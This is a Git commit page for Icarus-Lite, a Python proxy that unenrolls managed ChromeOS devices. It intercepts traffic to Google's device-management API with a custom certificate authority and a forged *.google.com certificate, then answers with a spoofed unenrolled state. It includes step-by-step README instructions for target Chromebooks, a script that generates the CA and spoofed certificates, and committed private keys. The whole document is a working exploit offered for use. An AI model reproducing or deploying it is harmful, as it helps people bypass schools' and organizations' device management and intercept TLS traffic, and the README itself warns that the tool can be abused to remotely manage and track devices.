kxtzownsu/Icarus-Lite
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

icarus lite

Browse Source
This commit is contained in:
kxtzownsu 2025-03-09 20:16:19 +00:00
parent 0f4de4c053
commit f5c486bdbb
14 changed files with 293 additions and 155 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
.gitignore vendored Normal file
View File

@ -0,0 +1,2 @@
.venv
__pycache__

75
README.md
View File

@ -1,67 +1,14 @@
# Icarus-Lite
Icarus Lite is a lightweight and easy-to-use version of the ChromeOS unenrollment exploit known as Icarus, which unenrolls devices with device management interception using a proxy and a custom Certificate Authority.
<br>
> Icarus Lite is based off the [original Icarus](https://github.com/MunyDev/icarus) code and works in the same way. Although the original Icarus is currently archived and no longer recieving support, Icarus Lite will be supported and updated.
## Warnings
- Icarus AND Icarus Lite <b>only</b> work on ChromeOS versions below 130. If you are above v130, please downgrade to use Icarus/Icarus Lite.
- Icarus Lite has <b>not been fully tested</b> as of March 7th, 2025. If you encounter issues while using, please create an Issue.
- Do not use any public Icarus proxies. Icarus can be used maliciously to remotely manage and track devices. Icarus Lite is intended to be simple to use, and self-hosting Icarus is heavily advised over using any public proxies.
- Icarus Lite does <b>NOT</b> currently have functionality to build Icarus shims. Please download a prebuilt shim to use Icarus Lite, or refer an Icarus fork for information on manually building shims.
Originally written by [cosmicdevv](https://github.com/cosmicdevv)
Improved by [kxtzownsu](https://github.com/kxtzownsu)
## Setup Instructions
### Windows
If you are on Windows, you can download a pre-compiled .exe version of Icarus in the "Releases" section of this repository. Alternatively, you can follow the Linux/Mac instructions below to manually build Icarus on your machine.
### Linux/Mac
If you are on Linux or Mac (or wish to run Icarus Lite from its source directly on Windows), the below instructions will cover how to run Icarus Lite.
1. Open a Command Prompt/Terminal window and run ``python --version`` and/or ``python3 --version``. If the command is not found, install Python from [python.org](https://python.org/downloads) (or wherever/however is best for your OS/distro). Once Python has been installed, <b>close and re-open a new terminal.</b>
2. Install the ``protobuf`` Python package, which can be done by running ``pip install protobuf`` and/or ``pip3 install protobuf``. On some Linux distros (specifically in managed environments), pip may not work correctly, in which case you may need to use ``sudo apt install python3-protobuf``.
3. Run ``git --version``. If the command is not found, install Git from [git-scm.com](https://git-scm.com/downloads) (or wherever/however is best for your OS/distro). Once Git has been installed, <b>close and re-open a new terminal.</b>
4. In whichever directory you want to copy Icarus Lite into, run ``git clone https://github.com/cosmicdevv/Icarus-Lite.git``, then run ``cd Icarus-Lite``.
5. Run ``python main.py`` and/or ``python3 main.py``.
6. Icarus Lite will attempt to automatically set up the required file structure and download the latest SSL certificates from kxtz's Icarus fork.
<details>
<summary>Icarus Lite failing to download certificates?</summary>
You will need to manually download the certificates from a proper source (recommended to use [kxtz's Icarus fork](https://git.kxtz.dev/kxtzownsu/httpmitm/src/branch/main/configs/m.google.com/public)) and place them into ``Icarus Lite/manualcerts``.
</details>
<!--
> [!IMPORTANT]
> You won't be able to use pre-built shims with this! You'd need to make new shims with ***your CA certificates***!
> If you want to use my (kxtz) shims, pass `--bypass` to the start.sh script below!
-->
## Usage Instructions
Once Icarus Lite is running, usage is extremely simple. <b>Icarus Lite will attempt to automatically fetch your local IP when the Proxy Server starts, and will provide you with an IP and port to use.</b> Using Icarus Lite on the target ChromeOS device is the same process as using normal Icarus assuming the device's Stateful Partition has already been modified by an Icarus shim. <b>The target ChromeOS device should be on the SAME network as the device hosting the Icarus Lite server.</b>
1. After rebooting into ChromeOS verified mode following using an Icarus shim, <b>do not click "continue"</b>. Instead, manually open the Network Configuration by clicking on the bottom-right icons which contain the time, WiFi, and Battery status. Once in Network Configuration, connect to your WiFi and enter the proxy settings.
2. Set "Connection Type" to Manual
3. Set the "Secure HTTP" IP address to the IP Icarus Lite gives you
4. Set the "Secure HTTP" port to the port Icarus Lite gives you
5. Click "Save"
6. Resume the ChromeOS setup process as normal and Icarus Lite should unenroll you.
<details>
<summary>Device still enrolling/getting "Can't reach Google"?</summary>
- Make sure that Icarus Lite is recieving and handling the ChromeOS device's requests; check the terminal/window where Icarus Lite is running for any output past "Icarus LITE is running on...". If nothing else has been output, it means Icarus Lite isn't recieving requests from the Chromebook and therefore is not handling them accordingly. In this case, re-run the Icarus shim and ensure:
- The target ChromeOS device and the device hosting the proxy are on the <b>SAME</b> WiFi network
- The shim used on the target ChromeOS device was built with the same CA (Certificate Authority) used to generate the SSL certificates.
- If you're using a prebuilt shim and don't know what CA was used, consider building your own shim and SSL certificates if nothing else works.
</details>
## Prebuilt Shim Downloads
Icarus Lite only replaces the server functionality of Icarus, but for Icarus to successfully unenroll a ChromeOS device, that device still must have had an Icarus shim ran on it. Icarus Lite does not currently have the functionality to build shims, so users must either use prebuilt shims or build their own shims from Icarus's original source. Instructions on building shims, along with a maintained fork of Icarus, can be found [here](https://github.com/fanqyxl/icarus?tab=readme-ov-file#setup-and-installation-instructions).
For prebuilt shims, it is recommended to download them from the below servers:
- [kxtz's download server](https://dl.kxtz.dev/)
- [fanqyxl's download server](https://dl.fanqyxl.net/)
## Certificates
In order for the client (target ChromeOS device) to establish a proper connection to the MiniSever, we need an SSL certificate to establish the secure tunnel. If the SSL certificate is invalid, the target device will reject the connection (which in most cases will bring you to a "Cannot reach Google" screen). Icarus uses a custom CA (Certificate Authority) which isn't trusted to external devices, which also means any SSL certificates generated from our custom CA will also not be trusted to external devices. This causes most devices (including any ChromeOS devices) to reject the connection because of the untrusted CA.
This is why a user must run an Icarus shim on a ChromeOS device prior to using the Icarus Lite server for unenrollment; in the simplest terms, the shim makes the device trust the CA so that way the device won't refuse the connection to the MiniServer.
When a shim has been built using a different CA than the SSL certificates, the target device will still reject the connection. This is why if constantly getting a "Can't reach Google" screen, users should consider building their own shim and SSL certificates.
SSL certificates can be generated using [generate_ssl_certificate.sh](https://github.com/fanqyxl/icarus/blob/main/httpmitm/generate_ssl_certificate.sh) once a CA has been generated.
## Future Updates
This section contains planned updates to Icarus Lite to improve functionality.
- Shim building implementation
## Credits
- [cosmicdevv](https://github.com/cosmicdevv) - Writing and maintaining Icarus Lite
- [MunyDev](https://github.com/MunyDev) - Discovering and creating original Icarus
- [Fanqyxl](https://github.com/fanqyxl) - new maintainer
- [kxtzownsu](https://github.com/kxtzownsu) - Maintaining certificates Icarus uses
## running
```
bash start.sh # starts the server
```

8
certs/extfile Normal file
View File

@ -0,0 +1,8 @@
authorityKeyIdentifier=keyid,issuer
basicConstraints=CA:FALSE
keyUsage = digitalSignature, nonRepudiation, keyEncipherment, dataEncipherment
subjectAltName = @alt_names
[alt_names]
DNS.1 = *.google.com

52
certs/google.com.key Normal file
View File

@ -0,0 +1,52 @@
-----BEGIN PRIVATE KEY-----
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
2zt3usjtt6PHbWvIUbvwbFT8J23c
-----END PRIVATE KEY-----

28
certs/google.com.pem Normal file
View File

@ -0,0 +1,28 @@
-----BEGIN CERTIFICATE-----
MIIEwDCCA6igAwIBAgIUYFIs25M7xEb/CE1RkIqWpkyRpoQwDQYJKoZIhvcNAQEL
BQAwaTELMAkGA1UEBhMCVVMxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM
GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDEiMCAGCSqGSIb3DQEJARYTa3h0em93
bnN1QGdtYWlsLmNvbTAeFw0yNTAzMDkxOTU0MDVaFw0yNTA0MDgxOTU0MDVaMFYx
CzAJBgNVBAYTAlVTMRAwDgYDVQQIDAdQUklWQVRFMRAwDgYDVQQHDAdQUklWQVRF
MREwDwYDVQQKDAhTdWNjZXNzITEQMA4GA1UECwwHU3VjY2VzczCCAiIwDQYJKoZI
hvcNAQEBBQADggIPADCCAgoCggIBALl1k2ekILTXv4YjlDXTqyxpfY+YTnAxuxKJ
eGmGILgoBQVhEnBjt5w1DowtGwSgLSVf+IPw4xSWZnbZuBCTIDTwueRrV8c7HduT
qD+YQwC9nMpoiR7+zw67oQI5rKzzF/RGn7pDJN2nC1aH1jWG9sp+rnp1sDRx7HFW
mpVqxAA/IrxB5FVTrnVd77eupcRW110UhlFiXF3fPTsFbe2oma/Rt7v8oZPoxBqf
ACvqxbNcoNZIb6o7gCL/J1srckDXgWzXvZlQ5Oz7IUkit+sacu7fl/HVrW7q0s7Q
c2UV175dSEnqhmt+5coxtCJFFS9MudrVy2GssOT03ir8WkSsc6ISWCL4g5NUVyHZ
pFp2fA8vEPhbkBhrqrs+mG/XwQS9ek9QHyPgVzj/5IdhVZINMzQoHkEBzsJtofoO
999X97PJGQHw+z6tyecw92li9ZnziRUiUsZG+S/KQ6A9hGzIy+FONWTALnqNqu7F
9puqS4AWpVhvtgnRYHevPhJaSKQTot6Rh5/5abrHLVKPiHWW8vbUkE4OsNkQPSd1
FG3kLvPIipgPZDe4zC9LuT4Zn6qbt1XP2lTlsA2wK8Vy3+JTVErEw+hYjyR8eVzo
Whf4hRFbP0tVNqlTi0gJXOZZB6ghLXksLKJLLfGCymCIxz3d60x/FphCzWHDUmJM
QWPA71CVAgMBAAGjczBxMB8GA1UdIwQYMBaAFF9t5L+U4myk2vyYOIEtFw4o47lZ
MAkGA1UdEwQCMAAwCwYDVR0PBAQDAgTwMBcGA1UdEQQQMA6CDCouZ29vZ2xlLmNv
bTAdBgNVHQ4EFgQUBbUr9zQGFq+z7k39+5KliCeOPgYwDQYJKoZIhvcNAQELBQAD
ggEBAD8I3sf2nmNTGvHIZuOsj5fGQwejegH/qVQBX5D9iWSRa4HhgeZ3tCIXahVL
KePykBLCI5F1se/Q1JBt/SEOSeY98CgRFTK+UbYsULdxgOTH2JV6YAsGQd/zLYnx
LeuUmTToPa92lPWeUbIoTOledMAxnhciC5oSTCmFSayh+0oDZbW5KKwjDjv3gjE1
yNpK28Akfsw5xOtDKiPOXuWlxSM95HfthE3YvZwiQ5ySG6tWcWgJQTHlCcjV67AY
O8ZtUN1NOsgXdp/kt1C7A5obtE4Sk48Fzly/WSkN8VwdBhOmhEGvb9lh3CEUave7
OoF3u/wPlSCiwxWBvp8TF6GC06U=
-----END CERTIFICATE-----

27
certs/in.csr Normal file
View File

@ -0,0 +1,27 @@
-----BEGIN CERTIFICATE REQUEST-----
MIIEmzCCAoMCAQAwVjELMAkGA1UEBhMCVVMxEDAOBgNVBAgMB1BSSVZBVEUxEDAO
BgNVBAcMB1BSSVZBVEUxETAPBgNVBAoMCFN1Y2Nlc3MhMRAwDgYDVQQLDAdTdWNj
ZXNzMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuXWTZ6QgtNe/hiOU
NdOrLGl9j5hOcDG7Eol4aYYguCgFBWEScGO3nDUOjC0bBKAtJV/4g/DjFJZmdtm4
EJMgNPC55GtXxzsd25OoP5hDAL2cymiJHv7PDruhAjmsrPMX9EafukMk3acLVofW
NYb2yn6uenWwNHHscVaalWrEAD8ivEHkVVOudV3vt66lxFbXXRSGUWJcXd89OwVt
7aiZr9G3u/yhk+jEGp8AK+rFs1yg1khvqjuAIv8nWytyQNeBbNe9mVDk7PshSSK3
6xpy7t+X8dWtburSztBzZRXXvl1ISeqGa37lyjG0IkUVL0y52tXLYayw5PTeKvxa
RKxzohJYIviDk1RXIdmkWnZ8Dy8Q+FuQGGuquz6Yb9fBBL16T1AfI+BXOP/kh2FV
kg0zNCgeQQHOwm2h+g7331f3s8kZAfD7Pq3J5zD3aWL1mfOJFSJSxkb5L8pDoD2E
bMjL4U41ZMAueo2q7sX2m6pLgBalWG+2CdFgd68+ElpIpBOi3pGHn/lpusctUo+I
dZby9tSQTg6w2RA9J3UUbeQu88iKmA9kN7jML0u5Phmfqpu3Vc/aVOWwDbArxXLf
4lNUSsTD6FiPJHx5XOhaF/iFEVs/S1U2qVOLSAlc5lkHqCEteSwsokst8YLKYIjH
Pd3rTH8WmELNYcNSYkxBY8DvUJUCAwEAAaAAMA0GCSqGSIb3DQEBCwUAA4ICAQA+
mL7S4IWvueQCMy4D5rz/UiPNH29CpZF5berKt/YayhmbhvnIuFF4S9SIMo+FPKFw
szPKdGh8WOyeJrGORktzZulyeR3+dKax6S73G/uTdkqxGHu+WJ9VsrUo30IUKw1C
J6Nn2/1YTBkWbgp24klP4OHofvZgBtGjTIfdxS7KWix+3Sj818VUSR9MzzbDJAiM
PjvcLYjjQ2w2qbfAdkwsqWewEs4tb+eASqu6w4X8ueYQoHZiTTC2dAQ+zzNDr3eu
NvPI83wcHYQGoLoyRjE7YrqJVTimR1oclj3D9gOULtxvPaf9LGBvHef6w5lmBpm4
QaVdw8HycoQlpKRTMasoTC194sse2yLtIOZSK10bl7dDIG8fdFFYGjVbaudLeVoT
9zFoGSMvJDJlGJSB0+sorbp+HgzPH0xDAnHWhjf3mhE17lKApC1BGx2BFQ+oUs9A
sqTrL8YPGwmBtlukl2Z0y3WTM2NnnmhE7tWdgiDYMclwILUSn3oblcNFuk6ijTMF
g0PRXJRL0uPukFm4oCYVGC85xFbdU/0HvEM3YUk/S+f6ygLzZmtySFKQFsDSdOlm
ueFuadvSXCmwEW+VTDsZJd5lyBKqPdHMyBYfKbDxqCVYy3c/NeF7F8fHu9tldefS
Ck241g2wa4cHolAw5oiCoxtZpQXtvRWh2EGIOhGqcQ==
-----END CERTIFICATE REQUEST-----

2
dmbackend/device_management_pb2.py
View File

File diff suppressed because one or more lines are too long

4
dmbackend/private_membership_rlwe_pb2.py
View File

File diff suppressed because one or more lines are too long

43
generate_certs.sh Normal file
View File

@ -0,0 +1,43 @@
#!/bin/bash
SCRIPT_DIR=$(dirname "$0")
SCRIPT_DIR=${SCRIPT_DIR:-"."}
caFileList="myCA.pem myCA.key myCA.der ../myCA.der"
cat <<EOF
CA & google.com key generator
written by kxtzownsu
(ty writable for helping me with openssl)
------------------------------------------
EOF
echo "Checking if CA keys exist.."
for file in $caFileList; do
if [ ! -f "${SCRIPT_DIR}/$file" ]; then
echo "CA keys are missing! Re-generating...."
rm -rf $caFileList # just in case the user has key instead of pem or vice versa
openssl genrsa -out "${SCRIPT_DIR}/myCA.key" 2048
openssl req -x509 -new -nodes -key "${SCRIPT_DIR}/myCA.key" -sha256 -days 1826 -out "${SCRIPT_DIR}/myCA.pem" # generates a 5y cert
openssl x509 -in "${SCRIPT_DIR}/myCA.pem" -out "${SCRIPT_DIR}/myCA.der" -outform DER
if [ -f "${SCRIPT_DIR}/../modify.sh" ]; then #we check here if the previous dir is icarus, not a good check but it works :D
cp "${SCRIPT_DIR}/myCA.der" "${SCRIPT_DIR}/../"
fi
fi
done
# generates new google.com keys
openssl genrsa -out "$SCRIPT_DIR/certs/google.com".key 4096
openssl req -new -key "$SCRIPT_DIR/certs/google.com".key -out "$SCRIPT_DIR/certs/in.csr" -subj "/C=US/ST=PRIVATE/L=PRIVATE/O=Success!/OU=Success/CN=$1"
cat > "$SCRIPT_DIR/certs/extfile" <<EOF
authorityKeyIdentifier=keyid,issuer
basicConstraints=CA:FALSE
keyUsage = digitalSignature, nonRepudiation, keyEncipherment, dataEncipherment
subjectAltName = @alt_names
[alt_names]
DNS.1 = *.google.com
EOF
openssl x509 -req -out "$SCRIPT_DIR/certs/google.com.pem" -CA "$SCRIPT_DIR/myCA.pem" -CAkey "$SCRIPT_DIR/myCA.key" -extfile "$SCRIPT_DIR/certs/extfile" -in "$SCRIPT_DIR/certs/in.csr"

110
main.py
View File

@ -20,16 +20,13 @@ import shutil
import threading
import select
import re
import requests
import http.server
import urllib.request
import urllib.parse
from dmbackend import device_management_pb2
pInitial = 3001 # The port that MiniServers will start up from.
sslCerts = {
"m.google.com.key": "https://git.kxtz.dev/kxtzownsu/httpmitm/raw/branch/main/configs/m.google.com/public/google.com.key",
"m.google.com.pem": "https://git.kxtz.dev/kxtzownsu/httpmitm/raw/branch/main/configs/m.google.com/public/google.com.pem"
} # Stores names and links of certificates to download
certPaths = {} # Stores paths of certificates on the local filesystem
# Custom function to print text with color to enhance user experience while reducing dependies (such as Colorama) that are needed
@ -53,7 +50,6 @@ class MiniServerHandler(http.server.SimpleHTTPRequestHandler):
def do_POST(self):
# Slightly rewritten part of dmbackend
# Get the body content of the request from the client
body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
# Create a dmr object
@ -64,7 +60,6 @@ class MiniServerHandler(http.server.SimpleHTTPRequestHandler):
resp = None
# all the magic originally by writable
if (dmr.HasField("device_state_retrieval_request")):
print("intercepting")
status_code = 200
resp = device_management_pb2.DeviceManagementResponse()
rr = resp.device_state_retrieval_response
@ -77,19 +72,20 @@ class MiniServerHandler(http.server.SimpleHTTPRequestHandler):
dv.disabled_state.message = ""
rr.restore_mode = 0
rr.management_domain = ""
print(dmr)
else:
req = urllib.request.Request("https://m.google.com/devicemanagement/data/api?" + urllib.parse.urlparse(self.path).query, data=data, headers=dict(self.headers), method="POST")
with urllib.request.urlopen(req) as response:
status_code = response.getcode()
con = response.read().decode()
con = requests.post("https://m.google.com/devicemanagement/data/api?" + urllib.parse.urlparse(self.path).query, data=body, headers=dict(self.headers))
status_code = con.status_code
resp = device_management_pb2.DeviceManagementResponse()
resp.ParseFromString(con)
resp.ParseFromString(con.content)
print(con)
# Send the response back to the client, which unenroll the device
self.send_response(status_code)
self.send_header("Content-Type", "application/x-protobuffer")
self.send_header("Content-Length", str(len(resp.SerializeToString())))
self.end_headers()
self.wfile.write(resp.SerializeToString())
colorprint("Successfully intercepted request.\n\n", "green")
class MiniServer:
@ -109,7 +105,7 @@ class MiniServer:
self.port = pInitial
continue
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile=certPaths["pem"], keyfile=certPaths["key"])
context.load_cert_chain(certfile="./certs/google.com.pem", keyfile="./certs/google.com.key")
self.httpd.socket = context.wrap_socket(self.httpd.socket, server_side=True)
pInitial += 1
threading.Thread(target=self.httpd.serve_forever).start() # Start the server in a separate thread so it doesn't block the main thread.
@ -117,7 +113,7 @@ class MiniServer:
def handle_client(client_socket, address):
# Initial request buffer
colorprint("// HANDLING REQUEST \\\\\n", "blue")
colorprint("// HANDLING REQUEST \\\\", "blue")
host = None
port = 0
is_tls = False
@ -174,7 +170,10 @@ def handle_client(client_socket, address):
# Acknowledge the request, then pipe the client to the MiniServer
client_socket.sendall(b"HTTP/1.1 200 Connection Established\r\n\r\n")
try:
tunnel_traffic(client_socket, miniserver_socket)
pipe = tunnel_traffic(client_socket, miniserver_socket)
# If tunnel closed on first packet (client likely rejected connection)
if not pipe:
colorprint("ERROR: The client may have rejected the connection. This is usually an SSL issue.", "red")
except Exception as e:
colorprint(f"ERROR: {e}\nThe client may have rejected the connection.", "red")
colorprint("Have you ran the Icarus shim on the target Chromebook?", "blue")
@ -192,7 +191,7 @@ def handle_client(client_socket, address):
server_socket.sendall(request)
# Same as .pipe() in NodeJS but we have to do it a bit differently.
try:
tunnel_traffic(client_socket, server_socket)
pipe = tunnel_traffic(client_socket, server_socket)
except Exception as e:
colorprint(f"ERROR: {e}\nUnknown failure tunneling traffic.", "red")
except Exception as e:
@ -214,83 +213,20 @@ def tunnel_traffic(client_socket, server_socket):
# normally we'd put a try catch exception here but i want it to raise an error when there is one
data = sock.recv(4096)
if not data:
# Socket closed
return
# If it's the first packet or something, return False for error handling purposes
if readable.index(sock) == 0:
return False
return True
first = False
peer_sock.sendall(data)
client_socket.close()
server_socket.close()
colorprint("Icarus Lite v1.0", "blue")
colorprint("Written by cosmicdevv", "blue")
colorprint("Checking installation...", "blue")
# Check if the Icarus folder exists
firstTime = False
if not os.path.exists("Icarus Lite"):
firstTime = True
colorprint("! WARNING !\nIcarus Lite is not set up in the local directory. Do you want to automatically set up? (Y/N)", "blue")
# Ask the user if they want to create the Icarus folder, loop to ensure valid input
while True:
choice = input().lower()
if choice in ["y", "yes"]:
break
elif choice in ["n", "no"]:
colorprint("Icarus Lite will not set up due to user choice.", "red")
exit()
# If they selected yes, create necessary folders
colorprint("Creating install folder...", "blue")
os.mkdir("Icarus Lite")
colorprint("Creating certificate folder...", "blue")
os.mkdir("Icarus Lite/autocerts")
colorprint("Creating manual certificate folder...", "blue")
os.mkdir("Icarus Lite/manualcerts")
colorprint("Creating dmbackend folder...", "blue")
os.mkdir("Icarus Lite/dmbackend")
colorprint("Downloading latest Icarus SSL certificates...", "blue")
success = True # If a download fails, this gets set to false
# Loop through all the necessary SSL certificates, where their filename is the key and the download url is the value
for sslCert in sslCerts:
try:
# Try to download the certificate from the url and place it in the autocerts folder
urllib.request.urlretrieve(sslCerts[sslCert], f"Icarus Lite/autocerts/{sslCert}")
if firstTime:
# Create a backup copy of the certificate in the manualcerts folder
shutil.copy(f"Icarus Lite/autocerts/{sslCert}", f"Icarus Lite/manualcerts/{sslCert}")
colorprint(f"Latest '{sslCert}' downloaded.", "green")
except Exception as e:
# If the download fails
success = False
colorprint(f"'{sslCert}' failed to download.", "red")
# If not all downloads were successful, run this
if not success:
colorprint("One or more certificates could not be downloaded. Checking ability to run...", "red")
# Check if the required certs were downloaded (in case we put other files in the download list for some reason)
if not os.path.exists("Icarus Lite/autocerts/m.google.com.key") or not os.path.exists(f"Icarus Lite/autocerts/m.google.com.pem"):
colorprint("Icarus Lite is unable to run from auto-downloaded certificates.", "blue")
messageDisplayed = False
# Loop until certificates are manually added to the manualcerts folder (we use a different folder for manual certs so if a user puts certs in a folder, they aren't overwritten by the autodownloads unless it's a fresh setup)
while True:
if os.path.exists("Icarus Lite/manualcerts/m.google.com.key") and os.path.exists(f"Icarus Lite/manualcerts/m.google.com.key"):
colorprint("Manual certificates found. Using manual certificates for Icarus Lite.", "green")
# Set the certificate paths to the manualcerts path
certPaths["key"] = "Icarus Lite/manualcerts/m.google.com.key"
certPaths["pem"] = "Icarus Lite/manualcerts/m.google.com.pem"
break
# If the user doesn't have certs in manualcerts on first check, prompt them to put them in.
if messageDisplayed == False:
colorprint("Please manually download the certificates and place them in:\nIcarus Lite/manualcerts/\nWaiting for certificates...", "blue")
messageDisplayed = True # Ensure the message isn't displayed every loop iteration
# small delay
time.sleep(1)
else:
# If the required certs were auto-downloaded, we'll use them
certPaths["key"] = "Icarus Lite/autocerts/m.google.com.key"
certPaths["pem"] = "Icarus Lite/autocerts/m.google.com.pem"
else:
# If all downloads were successful, we'll use the downloaded certs
certPaths["key"] = "Icarus Lite/autocerts/m.google.com.key"
certPaths["pem"] = "Icarus Lite/autocerts/m.google.com.pem"
colorprint("Improved by kxtzownsu", "blue")
port = 8080
port = 8126
proxy_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
proxy_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
proxy_socket.bind(("0.0.0.0", port))
@ -302,9 +238,7 @@ s.connect(("8.8.8.8", 1))
local_ip = s.getsockname()[0]
s.close()
# aaaaaaaaaaaaaaaaaaaaaa
print("\n\n\n")
colorprint(f"Icarus Lite is running on: {local_ip}:{port}", "blue")
colorprint(f"Icarus Lite is running on: {local_ip}:{port}", "green")
while True:
try:
client_socket, client_address = proxy_socket.accept()

BIN
myCA.der Normal file
View File

Binary file not shown.

28
myCA.key Normal file
View File

@ -0,0 +1,28 @@
-----BEGIN PRIVATE KEY-----
MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCiwBenclR6YAO3
GlX7RaaXo0Wo7Lx+LxlfgjwsY+jiXtOk8TrJ8qY8ZpIHARdXhKWv9NjpRjKrMm0J
AfNh9cO5WGC1+3TT3J0YcADLR7WEqfk3ogPUJDqOOHW5Qtap8l8ET/eMvZCZj9UE
qolDYTdqgtQNVxK0H4nZwnEo9KCsfi4ENegkaBZ1boNy/7sWWPJ1VfUy3hh0SLqB
tzxklDf8f2AOAfoc4GSD0RLGyEJORSXhUHs/fSpOsqJ9DfHKtqqGNhgB2EQHkfyB
